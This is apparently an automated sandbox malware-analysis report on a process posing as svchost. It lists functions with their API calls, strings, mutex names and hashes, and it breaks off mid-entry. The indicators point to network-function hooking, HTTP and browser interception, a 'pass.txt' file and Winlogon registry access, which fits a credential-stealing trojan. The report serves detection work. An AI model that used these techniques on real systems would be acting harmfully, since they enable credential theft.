Part of subcall function 02D1A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7591F550,00000000,75A7BD50,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A078
Part of subcall function 02D1A040: memcpy.MSVCRT ref: 02D1A0A0
Part of subcall function 02D1A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A135
Part of subcall function 02D1A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D1938A,?,?,?,?,?,?,02D1938A,00000000,02D191E0,02D5A04C), ref: 02D1A14A

LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02D19312
GetProcAddress.KERNEL32(00000000,send), ref: 02D19320
GetProcAddress.KERNEL32(00000000,WSASend), ref: 02D1933C
GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02D19358
GetProcAddress.KERNEL32(00000000,recv), ref: 02D19374

Strings

CryptEncrypt, xrefs: 02D192ED
ws2_32.dll, xrefs: 02D1930D
WSARecv, xrefs: 02D19352
advapi32.dll, xrefs: 02D192DC
send, xrefs: 02D1931A
WSASend, xrefs: 02D19336
recv, xrefs: 02D1936E

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
API String ID: 1216545827-2206184491
Opcode ID: 9ae5b8e1ef7871efad9880e7c39c785902d91691505628907794cdab1a43f812
Instruction ID: 7265ef353c5220050a2179c32c43ca44d55f762b75f0f14db7194ec1e720df14
Opcode Fuzzy Hash: 9ae5b8e1ef7871efad9880e7c39c785902d91691505628907794cdab1a43f812
Instruction Fuzzy Hash: 83011B6178172232FA3065667C22F8B124D6F45E94F250210B502F2B89DADCEC098878

Function 02D230C8 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 56sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02D230DC
ReleaseMutex.KERNEL32(00000000), ref: 02D230ED
GetHandleInformation.KERNEL32(00000000,?), ref: 02D23101
CloseHandle.KERNEL32(00000000), ref: 02D2310F
CreateThread.KERNEL32(00000000,00000000,02D22F60,00000000,00000000,00000000), ref: 02D23124
Sleep.KERNEL32(00009C40), ref: 02D23135
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2313A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D2314E
CloseHandle.KERNEL32(00000000), ref: 02D2315C
PathAddBackslashA.SHLWAPI(02D5CF94), ref: 02D23167
Sleep.KERNEL32(00009C40,02D5CF94,RSTYLE), ref: 02D23181
Sleep.KERNEL32(00000064), ref: 02D2318A

Strings

RSTYLE, xrefs: 02D2316D
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D230D0
\t, xrefs: 02D23167

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$RSTYLE$\t
API String ID: 505831200-280280100
Opcode ID: 2fb6abefbb9b4d61297123735e0f4b2a2614094bf4d618928918003f3353894e
Instruction ID: abe8943704e80730eb7a606e220b6f9cd781662c966a800ec2ec6b5f504df77f
Opcode Fuzzy Hash: 2fb6abefbb9b4d61297123735e0f4b2a2614094bf4d618928918003f3353894e
Instruction Fuzzy Hash: 4B11C234AC53327BF6615BA0AC0EF1E37D49F64B19F204544F945613C09BF49C198BA6

Function 004013C0 Relevance: 24.1, APIs: 16, Instructions: 133memoryfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,755CDB30,?,00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004013E7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401403
GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 00401423
HeapAlloc.KERNEL32(00000000,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 0040142A
memset.MSVCRT ref: 0040143D
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
HeapValidate.KERNEL32(00000000), ref: 004014A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
HeapFree.KERNEL32(00000000), ref: 004014B4
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004014D4
CloseHandle.KERNEL32(00000000,?,?,?,00401E04,00000000,755CDB30), ref: 004014E5
IsBadWritePtr.KERNEL32(?,00000004,755CDB30,?,00000000,?,?,?,00401E04,00000000,755CDB30,?,00000000,00402A87), ref: 004014F5

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
String ID:
API String ID: 132362422-0
Opcode ID: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction ID: 1e88e17013718af7825f0840a72b71bc919ec8abe2a586386afbdd05d1fe9019
Opcode Fuzzy Hash: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction Fuzzy Hash: C04156B1900214BBE7219FE59D89FAFBB7CEB84B11F104125FB04B72D0D774594487A8

Function 02D102A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197memorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 02D0FF00: memset.MSVCRT ref: 02D0FF54
Part of subcall function 02D0FF00: GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02D0FF6C
Part of subcall function 02D0FF00: HeapValidate.KERNEL32(00000000), ref: 02D0FF6F
Part of subcall function 02D0FF00: GetProcessHeap.KERNEL32(00000000,?), ref: 02D0FF7C
Part of subcall function 02D0FF00: HeapFree.KERNEL32(00000000), ref: 02D0FF7F
Part of subcall function 02D0FF00: InternetQueryOptionA.WININET(?,00000022,00000000,-02D4FAE4), ref: 02D0FF9C
Part of subcall function 02D0FF00: GetProcessHeap.KERNEL32(00000008,00000014), ref: 02D0FFB9
Part of subcall function 02D0FF00: HeapAlloc.KERNEL32(00000000), ref: 02D0FFC0
Part of subcall function 02D0FF00: memset.MSVCRT ref: 02D0FFD0

ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,02D10DEE,?,?,?,?,?), ref: 02D102E2
InternetSetStatusCallback.WININET(?,02D10260), ref: 02D102F6
GetProcessHeap.KERNEL32(00000008,00001010,?,?,?,?,?,?,?,?,?,02D10DEE,?,?,?,?), ref: 02D10307
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02D10DEE,?,?,?,?,?), ref: 02D1030E
memset.MSVCRT ref: 02D10321
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,02D10DEE,?,?,?,?,?), ref: 02D1035B
memcpy.MSVCRT ref: 02D103A7
InternetSetStatusCallback.WININET(?,0000000100000000), ref: 02D103D5
SetLastError.KERNEL32(00002EE4,?,?,?,?,?,?,?,?,?,02D10DEE,?,?,?,?,?), ref: 02D10431

Part of subcall function 02D10140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D1043D,00000001), ref: 02D1016B
Part of subcall function 02D10140: HeapValidate.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D1016E
Part of subcall function 02D10140: GetProcessHeap.KERNEL32(00000000,?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?), ref: 02D1017B
Part of subcall function 02D10140: HeapFree.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D1017E
Part of subcall function 02D10140: GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02D1043D,00000001), ref: 02D10197
Part of subcall function 02D10140: CloseHandle.KERNEL32(?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101A8
Part of subcall function 02D10140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D1043D,00000001), ref: 02D101B8
Part of subcall function 02D10140: HeapValidate.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101BB
Part of subcall function 02D10140: GetProcessHeap.KERNEL32(00000000,?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?), ref: 02D101C8
Part of subcall function 02D10140: HeapFree.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101CB
Part of subcall function 02D10140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D1043D,00000001), ref: 02D101DB
Part of subcall function 02D10140: HeapValidate.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101DE
Part of subcall function 02D10140: GetProcessHeap.KERNEL32(00000000,?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?), ref: 02D101EB
Part of subcall function 02D10140: HeapFree.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101EE

IsBadReadPtr.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02D10DEE,?,?,?,?), ref: 02D1046A
IsBadReadPtr.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02D10DEE,?,?,?,?), ref: 02D1047E
memcpy.MSVCRT ref: 02D10493

Strings

(, xrefs: 02D102EE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate$Internetmemset$AllocCallbackErrorHandleLastReadStatusmemcpy$CloseEventInformationOptionQueryReset
String ID: (
API String ID: 2621060597-3887548279
Opcode ID: 432bd41d6bb69177b0d09faff2e24473abc87f545cdd0ac3239d4c576be0ce03
Instruction ID: b94e0fb637673d082d110e1137660f2e5e9047aebeb2ca5d9a53589fdde5de38
Opcode Fuzzy Hash: 432bd41d6bb69177b0d09faff2e24473abc87f545cdd0ac3239d4c576be0ce03
Instruction Fuzzy Hash: 9D617D71604606BFD710EF64E885B6AB3A9FF48705F044A18FE489BB40DB74EC55CBA1

Function 02D181F0 Relevance: 22.6, APIs: 15, Instructions: 149fileCOMMON

Download Yara Rule

APIs

fseek.MSVCRT ref: 02D18236
fwrite.MSVCRT ref: 02D18245
fseek.MSVCRT ref: 02D1825B
fread.MSVCRT ref: 02D18268
fseek.MSVCRT ref: 02D182F2
fwrite.MSVCRT ref: 02D182FF
fclose.MSVCRT ref: 02D18307

Part of subcall function 02D17CD0: fseek.MSVCRT ref: 02D17D5B
Part of subcall function 02D17CD0: fwrite.MSVCRT ref: 02D17D72
Part of subcall function 02D17CD0: fwrite.MSVCRT ref: 02D17D81
Part of subcall function 02D17CD0: fwrite.MSVCRT ref: 02D17DA1

free.MSVCRT(?,?,?,?,?,?,?,02D23EB4), ref: 02D18320
free.MSVCRT(?,?,?,?,?,?,?,02D23EB4), ref: 02D18326
free.MSVCRT(?,?,?,?,?,?,?,02D23EB4), ref: 02D1832C
free.MSVCRT(?,?,?,?,?,?,?,02D23EB4), ref: 02D18332
free.MSVCRT(?,?,?,?,?,?,?,02D23EB4), ref: 02D1833B
free.MSVCRT(?,?,?,?,?,?,?,02D23EB4), ref: 02D18341
free.MSVCRT(?,?,?,?,?,?,?,02D23EB4), ref: 02D18344
free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,02D23EB4), ref: 02D18353

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: free$fwrite$fseek$fclosefread
String ID:
API String ID: 2434908339-0
Opcode ID: db442a0f1256d05d1ad25d0bbe809607d54326940473d1329631236133033e51
Instruction ID: 655eddd29e985c29cca6336602074c953e204574c848b1485227f092fa06ab39
Opcode Fuzzy Hash: db442a0f1256d05d1ad25d0bbe809607d54326940473d1329631236133033e51
Instruction Fuzzy Hash: 1341B571650705AFE724DBA8DC81B6AB3E5EF98310F184A2DE595C77D1C278F804CB61

Function 02D0E8C0 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D0E8D4
StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02D0F73F,?,?), ref: 02D0E935
StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02D0F73F,?,?), ref: 02D0E9F1
memcpy.MSVCRT ref: 02D0EB33
memcpy.MSVCRT ref: 02D0EBEE
memcpy.MSVCRT ref: 02D0EBFF
memcpy.MSVCRT ref: 02D0EC31

Strings

Content-Type, xrefs: 02D0EC9D
Content-Length, xrefs: 02D0EAED
Host, xrefs: 02D0EAB0
Referer, xrefs: 02D0EC48
NSS layer, xrefs: 02D0EBA1
https://, xrefs: 02D0EBC2, 02D0EBEC
http://, xrefs: 02D0EB80

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
API String ID: 438689982-3158524741
Opcode ID: 8d48c043481172cf68b5973b5524bb9957a16b01e5916a0a0550fe5ee3ea44df
Instruction ID: 0cb8ecfe512e8275033fe9dc99fa5ab56f4532ff271d386fc169fc6ded0b01e1
Opcode Fuzzy Hash: 8d48c043481172cf68b5973b5524bb9957a16b01e5916a0a0550fe5ee3ea44df
Instruction Fuzzy Hash: 73D12771E002165FEF358F68D8C0BEEBBA6AB45314F484E59D885A73E1D7309C41CBA0

Function 02D23A00 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 121threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D5D19C), ref: 02D23A40
PathAddBackslashA.SHLWAPI(02D5D19C), ref: 02D23A7D
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D23A92
GetLastError.KERNEL32 ref: 02D23A9C
IsUserAnAdmin.SHELL32 ref: 02D23AA4
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D23AB5
SetLastError.KERNEL32(00000000), ref: 02D23ABC
CreateThread.KERNEL32(00000000,00000000,02D23B90,00000000,00000000,00000000), ref: 02D23B25
GetHandleInformation.KERNEL32(00000000,?), ref: 02D23B3D
CloseHandle.KERNEL32(00000000), ref: 02D23B4E

Strings

pass.txt, xrefs: 02D23AD8
\t, xrefs: 02D23A33

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashCreateErrorHandleLast$AdminCloseDirectoryFolderInformationMakeSystemThreadUser
String ID: pass.txt$\t
API String ID: 3876079015-548412112
Opcode ID: d6a260ef20fdf1b9b4542df66d2cde180e6ade8b037d2ce538fc1d3e16112641
Instruction ID: d663e2e549b17ea84effe52176c2d9460b454657bf48d64bab261a0202c51cc4
Opcode Fuzzy Hash: d6a260ef20fdf1b9b4542df66d2cde180e6ade8b037d2ce538fc1d3e16112641
Instruction Fuzzy Hash: 08410438A442699BDB20DF24E858BEA7BE9EF29304F1444D4EC86D7340DB70DD58CBA0

Function 02D23A17 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 116threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D5D19C), ref: 02D23A40
PathAddBackslashA.SHLWAPI(02D5D19C), ref: 02D23A7D
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D23A92
GetLastError.KERNEL32 ref: 02D23A9C
IsUserAnAdmin.SHELL32 ref: 02D23AA4
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D23AB5
SetLastError.KERNEL32(00000000), ref: 02D23ABC
CreateThread.KERNEL32(00000000,00000000,02D23B90,00000000,00000000,00000000), ref: 02D23B25
GetHandleInformation.KERNEL32(00000000,?), ref: 02D23B3D
CloseHandle.KERNEL32(00000000), ref: 02D23B4E

Strings

pass.txt, xrefs: 02D23AD8
\t, xrefs: 02D23A33

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashCreateErrorHandleLast$AdminCloseDirectoryFolderInformationMakeSystemThreadUser
String ID: pass.txt$\t
API String ID: 3876079015-548412112
Opcode ID: a2fb8580befb9e85edddcd4236bb3a31f1ef55bdd2c854f58ecab3ba16d109f6
Instruction ID: 7cddc19d7174ef1f91506eadb8f4f9bc2c5492f2e4dbb48c5bfe78b1ff0f4ce5
Opcode Fuzzy Hash: a2fb8580befb9e85edddcd4236bb3a31f1ef55bdd2c854f58ecab3ba16d109f6
Instruction Fuzzy Hash: 5841D239A442659BDB20DF24E858BEA7BE9EF69304F144494EC86D7340DB70DD58CB60

Function 02D10140 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D1043D,00000001), ref: 02D1016B
HeapValidate.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D1016E
GetProcessHeap.KERNEL32(00000000,?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?), ref: 02D1017B
HeapFree.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D1017E
GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02D1043D,00000001), ref: 02D10197
CloseHandle.KERNEL32(?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101A8
GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D1043D,00000001), ref: 02D101B8
HeapValidate.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101BB
GetProcessHeap.KERNEL32(00000000,?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?), ref: 02D101C8
HeapFree.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101CB
GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D1043D,00000001), ref: 02D101DB
HeapValidate.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101DE
GetProcessHeap.KERNEL32(00000000,?,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?), ref: 02D101EB
HeapFree.KERNEL32(00000000,?,02D1043D,00000001,?,?,?,?,?,?,?,?,?,02D10DEE,?,?), ref: 02D101EE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate$Handle$CloseInformation
String ID:
API String ID: 2935687291-0
Opcode ID: 3b45a539af02de9b9aba151a95e7f314b3acf1be0537891f15ba58babde8a5c2
Instruction ID: 8db065eb1094aa2cbd0220c6c1b2936773c1b3ba2de016458b93bba0e1729427
Opcode Fuzzy Hash: 3b45a539af02de9b9aba151a95e7f314b3acf1be0537891f15ba58babde8a5c2
Instruction Fuzzy Hash: 9D31A375A412107BDB64AFA1B888F5B7BD8EF45726F548416ED08D7740CB74DC90CAA0

Function 02D24B30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 82memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 02D24B60
GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D24B79
HeapAlloc.KERNEL32(00000000), ref: 02D24B7C
memset.MSVCRT ref: 02D24B90
RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 02D24BB0
RegCloseKey.ADVAPI32(?), ref: 02D24BC0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24BD1
HeapValidate.KERNEL32(00000000), ref: 02D24BD4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D24BE1
HeapFree.KERNEL32(00000000), ref: 02D24BE4

Strings

Software\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 02D24B45
Shell, xrefs: 02D24BAA

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocCloseFreeOpenQueryValidateValuememset
String ID: Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon
API String ID: 2162099866-2454539505
Opcode ID: 5a0d35eb4ef54bce1d36017ee8fe6e78ac3a24e15fa6249baad7f095c614bc0f
Instruction ID: c29be3df73e9826a642b5b121638384458f16f2d69eb91f6d8899c1406eec40e
Opcode Fuzzy Hash: 5a0d35eb4ef54bce1d36017ee8fe6e78ac3a24e15fa6249baad7f095c614bc0f
Instruction Fuzzy Hash: 3D21C379E812247BEB209EA4AC49F9FBBACEF55B59F100545FD08E7340DAB09D14C6E0

Function 02D1EA80 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02D1EA9C
Sleep.KERNEL32(00000064), ref: 02D1EAB2
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02D1EAC0
ReleaseMutex.KERNEL32(00000000), ref: 02D1EAC9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D1EAE1
CloseHandle.KERNEL32(00000000), ref: 02D1EAF3
PathAddBackslashA.SHLWAPI(5c59043a), ref: 02D1EAFE
Sleep.KERNEL32(00009C40,5c59043a,CRAIF), ref: 02D1EB18

Strings

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}, xrefs: 02D1EA90, 02D1EAB4
CRAIF, xrefs: 02D1EB04
\t, xrefs: 02D1EAFE
5c59043a, xrefs: 02D1EAF9, 02D1EB09

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: 5c59043a$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$\t
API String ID: 849374196-2632522190
Opcode ID: 09b8ae951ca7262d2879b428215ce0108eb852953e8eda3ff21ac52b1d185e4b
Instruction ID: 7654d419ffa520479821cdcc79b040bdcc5ce89e834d73045659a24df648266d
Opcode Fuzzy Hash: 09b8ae951ca7262d2879b428215ce0108eb852953e8eda3ff21ac52b1d185e4b
Instruction Fuzzy Hash: 2501F935EC47243BF2119BA07C89F5EB3C8AF04B54F544505FE05963C09BF0AC148AA5

Function 02D06070 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D06070
DnsFlushResolverCache.DNSAPI ref: 02D0607A
LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,74E17390), ref: 02D0608A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02D060A3
GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02D060BF
GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02D060DB
GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02D060F7

Strings

DnsQuery_UTF8, xrefs: 02D060B9
DnsQuery_A, xrefs: 02D0609D
DnsQuery_W, xrefs: 02D060D5
Dnsapi.dll, xrefs: 02D06085
Query_Main, xrefs: 02D060F1

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
API String ID: 2466897691-3547598143
Opcode ID: 081b0aa99ab6cb0746704c4beae8b674aa1f40a30093c560705bb596e9f9d9ee
Instruction ID: fffb06120687483aa8b7b553d5e76f72d749ac93a7a087511f6b1c3266262b05
Opcode Fuzzy Hash: 081b0aa99ab6cb0746704c4beae8b674aa1f40a30093c560705bb596e9f9d9ee
Instruction Fuzzy Hash: 6E018F35BC231673B92036727C8AF4F174D5E10E50BA40410B903B1394CED8EC2988F9

Function 02D1C670 Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 45sleepsynchronizationCOMMON

Download Yara Rule

APIs

